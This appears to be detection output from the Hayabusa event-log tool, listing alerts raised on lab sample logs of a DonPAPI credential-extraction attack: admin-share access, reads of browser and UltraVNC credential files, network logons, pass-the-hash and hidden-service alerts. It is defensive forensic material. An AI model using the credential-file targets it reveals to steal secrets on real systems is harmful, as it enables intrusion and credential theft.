Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.127 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724935 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.189 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x872496f | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249a8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.269 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249a8 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249e1,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.333 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249e1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724a17,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724a17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.382 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724a17 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ba1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.476 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ba1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724bd7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.539 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724bd7 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
